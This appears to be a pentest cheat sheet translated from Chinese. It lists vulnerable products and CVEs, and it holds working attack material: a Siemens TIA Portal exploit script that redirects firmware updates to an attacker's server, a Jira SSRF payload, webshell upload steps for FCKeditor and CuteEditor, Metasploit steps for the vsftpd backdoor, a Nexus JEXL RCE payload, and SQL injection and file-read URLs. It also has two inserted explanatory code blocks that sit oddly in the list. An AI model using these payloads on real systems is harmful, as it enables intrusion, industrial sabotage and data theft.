Jira
SSRF (CVE-2019-8451)
url = url + '/plugins/servlet/gadgets/makeRequest?url=' + host + '@www.baidu.com/'
Jira unauthenticated server-side template injection remote code execution (CVE-2019-11581)
Arbitrary file upload
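Why the `host + '@www.baidu.com/'` payload above works: the makeRequest servlet accepts a URL that merely starts with the Jira base URL, while the HTTP client that fetches it parses everything before the last `@` in the authority as userinfo and connects to whatever follows. The Python below is an added illustration, not code from the page or from Atlassian; `JIRA_BASE` and `DESTINATION` are constructed values, and `strict_same_origin` is one hardened check of the kind the fix needs.

```python
from urllib.parse import urlsplit

# Constructed example values: a hypothetical Jira base URL and the
# internal destination the SSRF is meant to reach.
JIRA_BASE = "http://jira.example.com:8080"
DESTINATION = "169.254.169.254/latest/meta-data/"


def ssrf_param(base: str, destination: str) -> str:
    """The url= value in the page's payload shape: the Jira host before '@',
    the real destination after it."""
    return base + "@" + destination


def makerequest_url(base: str, destination: str) -> str:
    """Full request to the makeRequest servlet (CVE-2019-8451 shape)."""
    return base + "/plugins/servlet/gadgets/makeRequest?url=" + ssrf_param(base, destination)


def naive_same_origin(url: str, base: str) -> bool:
    """A prefix check: passes anything that merely starts with the base URL."""
    return url.startswith(base)


def effective_host(url: str) -> str:
    """Host an RFC 3986 parser actually connects to. Everything before the
    last '@' in the authority is userinfo, not the host."""
    return urlsplit(url).hostname or ""


def strict_same_origin(url: str, base: str) -> bool:
    """Hardened check: parse both URLs, refuse any userinfo, and compare
    scheme, hostname and port instead of a string prefix."""
    u, b = urlsplit(url), urlsplit(base)
    if u.username is not None or u.password is not None:
        return False
    return (u.scheme, u.hostname, u.port) == (b.scheme, b.hostname, b.port)


if __name__ == "__main__":
    p = ssrf_param(JIRA_BASE, DESTINATION)
    print(makerequest_url(JIRA_BASE, DESTINATION))
    print("prefix check passes:", naive_same_origin(p, JIRA_BASE))
    print("request really goes to:", effective_host(p))
    print("strict check passes:", strict_same_origin(p, JIRA_BASE))
```

The same host-confusion applies to any allowlist implemented as `startswith`: compare parsed components, and reject URLs that carry userinfo at all, since a legitimate gadget URL never needs it.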
EdgeHTML
Microsoft Edge remote code execution (CVE-2017-8619)
Dahua cameras
Unauthenticated access. Affected: DH-IPC-HDW23A0RN-ZS DH-IPC-HDBW23A0RN-ZS DH-IPC-HDBW13A0SN DH-IPC-HDW13A0SN DH-IPC-HFW13A0SN-W DHI-HCVR51A04HE-S3 DHI-HCVR51A08HE-S3 DHI-HCVR58A32S-S2
Exim mail server
Exim deliver_message command injection (CVE-2019-10149)
DeleGate
DeleGate DNS message decompression remote denial of service (CVE-2005-0036)
Fastjson
RCE, Fastjson < 1.2.48
Spring
Pivotal Spring Framework isWritableProperty SpEL expression injection (CVE-2018-1273); CVE-2018-1270
ImageMagick
RCE (CVE-2016-3714)
Axis2
Weak password
Arbitrary file read
AWStats
Path disclosure: http://www.xx.com.cn/cgi-bin/awstats.pl?config=xxx
ccs
Injection
ISC BIND
TSIG buffer overflow
Denial of service (CVE-2014-8500)
Denial of service (CNVD-2018-17514)
ISC BIND security restriction bypass (CVE-2017-3143)
HFS
RCE
PHP
PHP 7 zip extension integer overflow (CVE-2016-3078) -> can lead to RCE; affects every PHP 7.x release before 7.0.6
phpMyAdmin
Weak password
phpMoAdmin
RCE
node.js
node.js V8 debugger RCE
Elasticsearch
RCE
Unauthenticated access
Arbitrary file read
OpenSSL
DROWN attack (CVE-2016-0800): any server that still accepts SSLv2. Fixed in OpenSSL 1.0.2g and 1.0.1s (advisory of 1 March 2016); the out-of-support 1.0.0 and 0.9.8 branches are also affected
libssh
libssh authentication bypass (CVE-2018-10933): libssh 0.8.x - 0.8.3, libssh 0.7.x - 0.7.5, libssh 0.6.x
Netgear
Netgear DGN1000B setup.cgi remote command injection
Bash
Shellshock (CVE-2014-6271). Affects the mainstream Linux and Mac OS X platforms, including but not limited to Red Hat, CentOS, Ubuntu, Debian, Fedora, Amazon Linux and OS X 10.10
Kubernetes
Kubernetes privilege escalation (CVE-2018-1002105): Kubernetes v1.0.x-1.9.x; v1.10.0-1.10.10 (fixed in v1.10.11); v1.11.0-1.11.4 (fixed in v1.11.5); v1.12.0-1.12.2 (fixed in v1.12.3)
Zabbix
latest.php SQL injection
jsrpc.php SQL injection
ActiveMQ
Admin console weak password
RCE
Arbitrary file upload
ActiveMQ physical path disclosure
FCKeditor
https://www.jianshu.com/p/b0295978da77
Version fingerprinting: /fckeditor/editor/dialog/fck_about.html, /FCKeditor/_whatsnew.html
http://x.com/goldpen/editor/filemanager/browser/default/  # file browser exposes the site's files
Upload vulnerability
http://www.xx.gov.cn/FCkeditor/editor/filemanager/upload/test1.html
Open this page and upload a webshell carrying an image extension directly.
Uploaded file: http://www.xx.gov.cn/UploadFile/2.php;.gif (IIS 6.0 stops parsing the name at the ';' and executes it as 2.php)
KindEditor
XSS
Upload vulnerability
CuteEditor
Upload vulnerability
ASPX edition. The publicly disclosed CuteEditor vulnerability, combined with the IIS 6.0 parsing vulnerability, yields a webshell. If a WAF blocks the IIS 6.0 parsing trick, change the image suffix to bypass it.
Apache
Apache ActiveMQ 5.x ~ 5.14.0: ActiveMQ arbitrary file move vulnerability. Apache ActiveMQ before 5.13.0: deserialization vulnerability (CVE-2015-5254). Apache ActiveMQ 5.14.0 - 5.15.2: ActiveMQ information disclosure (CVE-2017-15709)
Apache mod_jk access control bypass (CVE-2018-11759)
Port 61616 (ActiveMQ message broker port)
Hudson
Source code disclosure
Grafana
Weak password
OpenSSH
CVE-2015-5600
CVE-2016-6515
CVE-2014-1692
CVE-2010-4478
CVE-2016-10009
CVE-2016-1908
CVE-2015-8325
CVE-2016-10012
CVE-2016-10010 (privilege escalation)
Atlassian
CVE-2019-1158
docker
CVE-2018-15664
Siemens TIA Portal (STEP7)
RCE: CVE-2019-10915
##
# Exploit Title: Siemens TIA Portal remote command execution
# Date: 06/11/2019
# Exploit Author: Joseph Bingham
# CVE : CVE-2019-10915
# Advisory: https://www.tenable.com/security/research/tra-2019-33
# Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a
# Affected Vendors/Device/Firmware:
# - Siemens STEP7 / TIA Portal
##

##
# Example usage
# $ python cve_2019_10915_tia_portal_rce.py
# Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}'
# Received '40'
# Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]'
##

import websocket, ssl, argparse

parser = argparse.ArgumentParser()
parser.add_argument("target_host", help="TIA Portal host")
parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int)
parser.add_argument("update_server", help="Malicious firmware update server IP")
args = parser.parse_args()

host = args.target_host
port = args.target_port
updatesrv = args.update_server

# socket.io endpoint of the TIA Portal service, reached without authentication.
# The service certificate is self-signed, so verification is disabled.
# str(port): argparse parses the port as an int.
ws = websocket.create_connection("wss://"+host+":"+str(port)+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={"cert_reqs": ssl.CERT_NONE})

# Other module functions reachable over the same channel, kept for reference:
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]'
#req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},"responseEvent":" "}]'

# Repoint the firmware update source at the attacker-controlled server.
# Backslashes are doubled twice so the JSON on the wire carries "\\" (one backslash).
req = '42["cli2serv",{"moduleFunc":"SoftwareModule.saveUrlSettings","data":{"ServerUrl":"https://'+updatesrv+'/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\\\","USBDrivePath":"","downloadDestinationPath":"C:\\\\Siemens\\\\TIA Admin\\\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\\\Siemens\\\\TIA Admin\\\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]'
ws.send(req)

result = ws.recv()
print("Received '%s'" % result)

result = ws.recv()
print("Received '%s'" % result)

result = ws.recv()
print("Received '%s'" % result)
WinRAR
CVE-2018-20250 (WinRAR RCE, ACE archive path traversal)
Affected:
WinRAR < 5.70 Beta 1
Bandizip <= 6.2.0.0
Haozip (2345 Compression) <= 5.9.8.10907
360 Compression <= 4.0.0.1170
Ghostscript
Affected versions: <= 9.23 (all versions, all platforms)
CVE-2017-8291
Ghostscript < 2017-04-26 (releases before the fix of that date)
Flash
CVE-2018-4878
Project: https://github.com/Sch01ar/CVE-2018-4878.git
Affected versions: Adobe Flash Player <= 28.0.0.137
Office
CVE-2017-11882 (RCE)
Affected versions:
Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016
vsftpd
vsftpd 2.3.4 backdoor ("smiley face" vulnerability)
msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST IP
run
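What the Metasploit module above does, written out by hand: the trojaned vsftpd 2.3.4 starts a root shell listener on TCP port 6200 as soon as it has read a USER line containing `:)`. The checker below is an added example, not the page's or Metasploit's code. `FakeVsftpd234` is a constructed loopback stand-in (in trojaned and clean flavours) so the logic can be exercised offline; against a real host the call is just `check_vsftpd_backdoor(target)` with the default ports.

```python
import socket
import threading
import time

BACKDOOR_TRIGGER = b":)"   # vsftpd 2.3.4's backdoor fires when the USER line contains this
BACKDOOR_PORT = 6200       # port on which the backdoored daemon then offers a shell


def _port_open(host: str, port: int, timeout: float) -> bool:
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def check_vsftpd_backdoor(host: str, ftp_port: int = 21,
                          shell_port: int = BACKDOOR_PORT, timeout: float = 3.0) -> bool:
    """True only if sending a ':)' USER makes a command shell appear on shell_port."""
    # Something already listening on the shell port would be a false positive
    # (an unrelated service, or a listener left by an earlier trigger).
    if _port_open(host, shell_port, 0.5):
        return False
    with socket.create_connection((host, ftp_port), timeout=timeout) as ctl:
        ctl.recv(1024)  # 220 banner
        ctl.sendall(b"USER scan" + BACKDOOR_TRIGGER + b"\r\n")
        ctl.recv(1024)  # 331 reply
        ctl.sendall(b"PASS scan\r\n")
        # The backdoored daemon forks its listener once the USER line is read
        # and does not answer PASS, so poll the shell port instead of waiting.
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            try:
                with socket.create_connection((host, shell_port), timeout=timeout) as sh:
                    sh.sendall(b"id\n")
                    return b"uid=" in sh.recv(1024)
            except OSError:
                time.sleep(0.2)
    return False


class FakeVsftpd234:
    """Constructed loopback stand-in for vsftpd 2.3.4 so the check runs offline.
    backdoored=True mimics the trojaned build, False a clean one."""

    def __init__(self, backdoored: bool = True):
        self.backdoored = backdoored
        self.ftp = socket.socket()
        self.ftp.bind(("127.0.0.1", 0))
        self.ftp.listen(1)
        self.shell = socket.socket()
        self.shell.bind(("127.0.0.1", 0))  # bound but not listening until triggered
        self.ftp_port = self.ftp.getsockname()[1]
        self.shell_port = self.shell.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self) -> None:
        conn, _ = self.ftp.accept()
        with conn:
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            user_line = conn.recv(1024)
            conn.sendall(b"331 Please specify the password.\r\n")
            if self.backdoored and BACKDOOR_TRIGGER in user_line:
                self.shell.listen(1)
                sh, _ = self.shell.accept()
                with sh:
                    sh.recv(1024)                        # the "id" command
                    sh.sendall(b"uid=0(root) gid=0(root)\n")
            else:
                conn.recv(1024)                          # PASS
                conn.sendall(b"530 Login incorrect.\r\n")


if __name__ == "__main__":
    fake = FakeVsftpd234()
    print(check_vsftpd_backdoor("127.0.0.1", fake.ftp_port, fake.shell_port))
```

The pre-check on the shell port matters in practice: the backdoor listener, once spawned, keeps running, so a second scan of the same host would otherwise report a hit without having proven anything about the FTP daemon.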
memcached
Common port 11211; unauthenticated access
memcached DRDoS vulnerability (B6-2018-030102), 1.4.31
memcached append/prepend remote code execution (CVE-2016-8704), 1.4.31
memcached update remote code execution (CVE-2016-8705), 1.4.31
memcached SASL authentication remote code execution (CVE-2016-8706), 1.4.31
Jenkins
Common port 8080; unauthenticated access; deserialization (CVE-2017-1000353); CVE-2018-1999002
GeoServer
1. Weak password
"Javascript is required to actually use the GeoServer admin console." - the site has not been added to the browser's trusted sites
2. XXE (versions below 2.7.1.1)
CCProxy
CCProxy 6.0 remote overflow
Solr
Unauthenticated access; CVE-2017-12629 XXE & RCE; CVE-2019-0193 RCE
Secure File Transfer
version <= 0.18: CVE-2015-2856, CVE-2015-2857; version <= 0.20: CVE-2016-2350, CVE-2016-2351, CVE-2016-2352, CVE-2016-2353
Kibana
Elasticsearch Kibana local file inclusion (CVE-2018-17246)
SCOoffice
SCOoffice Server "STARTTLS" plaintext injection
LIVE555
LIVE555 RTSP server buffer overflow (CVE-2018-4013) -> RCE
Ruby on Rails
Ruby on Rails path traversal and arbitrary file read (CVE-2019-5418)
systemd
systemd dns_packet_new heap buffer overflow, remotely triggerable (CVE-2017-9445). Affected: systemd 223 (June 2015) through systemd 233 (March 2017). Affects Ubuntu 17.04 and 16.10; Debian Stretch (Debian 9), Buster (10) and Sid (unstable); and other Linux distributions that use systemd
D-Link
D-Link DSL-2750B arbitrary command execution
Kingsoft security suite
ksapi.sys leaves critical locations unprotected, allowing the restriction to be bypassed
webTextbox editor
Cookie spoofing
eWebEditor
Arbitrary file upload: http://nel.xx.com//main/model/newsoperation/webEditor/eWebEditor.jsp
GPON routers
Authentication bypass (CVE-2018-10561); command injection (CVE-2018-10562)
Advantech Studio
Advantech Studio NTWebServer arbitrary file access. Affected: Advantech Studio 7.0
Nexus
CVE-2019-7238
{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":10}
Tongda OA
Office Anywhere network intelligent office system
Path disclosure; phpMyAdmin can be reached without logging in, and with root privileges
/mysql/main.php
RCE http://**.**.**.**:8080/ServiceAction/com.velcro.base.DataAction?sql=xp_cmdshell%20%27whoami%27
ZenTao 11.6.2
Privilege bypass
http://127.0.0.1/zentaopms_11.6/www/api-getModel-user-getRealNameAndEmails-users=admin
SQL injection: http://127.0.0.1/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user
Arbitrary file read: http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd
RCE
FasterXML
Jackson-databind CVE-2019-12384 (RCE). Affected versions: Jackson-databind 2.x < 2.9.9.1. Not affected: Jackson-databind 2.9.9.1, Jackson-databind 2.10